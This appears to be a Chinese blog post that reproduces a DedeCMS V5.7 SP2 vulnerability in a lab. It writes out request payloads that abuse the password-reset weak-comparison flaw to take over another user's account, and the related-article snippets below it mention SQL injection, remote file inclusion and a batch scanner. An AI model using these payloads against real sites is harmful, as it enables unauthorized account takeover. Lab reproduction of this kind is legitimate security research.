dedecms漏洞复现+分析

最新推荐文章于 2023-08-16 19:13:52 发布
最新推荐文章于 2023-08-16 19:13:52 发布
阅读量1.1k 收藏 4
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44897902/article/details/103846950
版权

1.修改任意用户密码

首先注册两个用户,123,1234;在后台已知123的id为2,1234的id为3
登录1234,修改id为2的密码
payload:

/DedeCMS-V5.7-UTF8-SP2/uploads/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2

抓包可看到key
在这里插入图片描述此时key为62dlYmGv
payload

192.168.91.141/DedeCMS-V5.7-UTF8-SP2/uploads/member/resetpassword.php?dopost=getpasswd&id=2&key=62dlYmGv

可以看到,直接跳转到了123的密码找回界面
在这里插入图片描述并且登录成功
在这里插入图片描述具体分析参见:这儿

2.普通用户越权

ring4ring
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dedecms v5.7越权漏洞
xxxMIng的博客
12-28 1956
环境搭建: 在win7x64上安装phpstudy 将网站源码 放置于C:\phpStudy\PHPTutorial\WWW\dedecms 并启动phpstudy 将运行模式放在系统服务上 应用 从物理机上访问该地址的index.php网页 进行下一步继续设定数据密码为root 管理员登陆 admin 密码 admin 点击继续即可完成搭站 ...
远程文件包含漏洞dedecms5.7 sp1版本漏洞
kid的博客
06-05 5985
远程文件包含漏洞dedecms5.7 sp1版本漏洞) 前言 前面看一个视频提到这个漏洞,自己觉得这种漏洞然后分析原因还是蛮有意思的,所以这里也来实一下这个漏洞,自己动手还是很重要的一个过程吧 过程 首先是搭建环境,phpstudy + dedecms5.7 sp1基本是一键安装 漏洞原因主要是在install的index.php文件中 foreach(Array('_...
记录我悲惨的一天(漏洞12小时,一个未成功)
ArBitrarilyR的博客
06-21 1295
记录自己12小时失败的漏洞
dedecms手机站下一篇跳转bug
qq_36766004的博客
05-17 472
用的是DedeCMS-V5.7-UTF8-SP2上一篇下一篇代码在include/arc.archives.class.php,大概在839行左右 $mlink = 'view.php?aid='.$preRow['id'];应改成 $mlink = 'view.php?aid='.$nextRow['id'];不然点击下一篇跳转的id是上一篇的,当没有上一篇时,title有但是链接跳转的地址就不...
dede5.7 跳转view.php,DedeCMS V5.7 download.php url重定向漏洞解决方法
weixin_42515376的博客
03-31 273
360网站安全检测发提示了一个漏洞——[警告]DedeCMS V5.7 download.php url重定向漏洞,该漏洞看文件也知道对应的是/plus/download.php这个文件!那么如何修漏洞呢?360网站安全给出的提示是升级到最新版本。。。或许升级确实有用,但是升级可能会对网站造成各种问题!例如标签调用,后台文件修改,如果做过二次开发就更不要轻易升级!所以只能对/plus/dow...
DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)
末初的CSDN博客
05-18 2379
文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞 漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本 漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理 继续分析 uploads/install/i
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
wLHK-Dedecms漏洞整理.pdf
09-20
下面我们将对这些漏洞进行详细的分析和解释。 首先,我们来看第一个漏洞,即Dedecms /member/reg_new.php SQL 注入漏洞。该漏洞存在于注册页面的用户注册过程中,当用户提交注册信息时,如果输入的用户名或密码包含...
DeDeCMS前台任意用户密码修改漏洞.pdf
12-16
漏洞需要一个特定的环境,即PHP 5.6版本运行的DeDeCMS V5.7SP2正式版(发布日期2018-01-09)。为了演示漏洞利用过程,首先需要在本地或服务器上搭建一个DeDeCMS站点,例如使用phpstudy工具。确保DeDeCMS的文件...
PHP整合dedecms+ucenter+discuzX,实单点登录.zip
01-16
"PHP整合dedecms+ucenter+discuzX,实单点登录"是一个针对这个问题的解决方案,它通过集成这三个流行的开源系统——织梦CMS(Dedecms)、uCenter和DiscuzX,让用户的登录状态在各个系统间同步,提高了用户体验和...
完美URL跳转漏洞
swordheart的博客
04-18 4609
漏洞详情 披露状态: 2010-08-01: 细节已通知厂商并且等待厂商处理中 2010-08-02: 厂商已经确认,细节仅向厂商公开 2010-08-12: 细节向核心白帽子及相关领域专家公开 2010-08-22: 细节向普通白帽子公开 2010-09-01: 细节向实习白帽子公开 2010-08-31: 细节向公众公开 简要描述: 此漏洞是用于网络钓鱼攻击,让用户访问恶意网站而不自知。 详细说明: Web应用程序接收到用户提交的URL参数后,没有对参数做“可信任URL”的验证,就向用户浏览
漏洞--织梦CMS_V5.7任意用户密码重置漏洞
最新发布
HengMengSec的博客
08-16 1972
织梦内容管理系统(DeDeCMS)以其简单、实用、开源的特点而著名。作为国内最知名的PHP开源网站管理系统,它在多年的发展中取得了显著进步,无论在功能还是易用性方面都有长足的发展。该系统广泛应用于中小型企业门户网站、个人网站、企业和学习网站建设。在中国,DedeCMS被认为是最受欢迎的CMS系统之一。但是,最近发该系统的一个漏洞位于member/resetpassword.php文件中。由于未对接收的参数safeanswer进行严格的类型判断,攻击者可以利用弱类型比较来绕过安全措施。
利用安全狗防护DedeCMS v5.7高危注入漏洞 [制链接]
IT技术宅-北方的刀郎
03-21 8335
漏洞版本:DedeCMS v5.7 20130607之后版本http://bbs.safedog.cn/thread-52264-1-1.html       漏洞触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll。       漏洞触发根源:在于/include/dedesql.class.php文件中程序未初始化$arrs1和$arrs2这两
dedecms漏洞
https://www.cnblogs.com/zpchcbd/
05-10 2782
5.7 sp1 爆数据库 /plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&a...
DeDeCMS v5.7{SP1,SP2} 密码修改漏洞(附PoC)
热门推荐
公众号shadow sock7
11-12 1万+
原文:https://paper.seebug.org/507/ 由于admin无法前台登录,所以需要先拿到admin的前台权限。 先拿到admin的前台权限 1.注册0000001用户名的账号 审核通过(或者设置为不需审核) 2. 访问/member/index.php?uid=0000001。 注意只有访问了/member/index.php?uid=0000001才会生成相应的所需的cook...
dedecms-v5.7-sp1远程文件包含getshell
What_Happened的博客
12-13 6262
前段时间自己搭了个dedecms-v5.7-sp1的靶机来练手,偶然在网上发了一篇靠谱的文章,讲的是dedecms的一个远程文件包含getshell的方法,理解了以后决定自己再写出来,以加深印象~ 利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件为\install\index.php.bak 。       其次,目标站点的Apache存在文件解
dedecms5.7最新漏洞
a1079540945的专栏
10-15 4163
文章来源:武汉八音猫科技有限公司
dedecmsv5.7sp1远程文件包含漏洞审计
安全大白
10-27 774
漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖以至于最后引起远程文件包含漏洞
dedecms漏洞
03-28
由于 Dedecms 平台存在多个漏洞,以下是一个常见的 Dedecms 漏洞过程: 1. 扫描目标 Dedecms 站点,确定其版本号和漏洞类型。 2. 找到对应的漏洞利用代码,例如 Dedecms v5.7 SP2 sql注入漏洞利用代码: ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值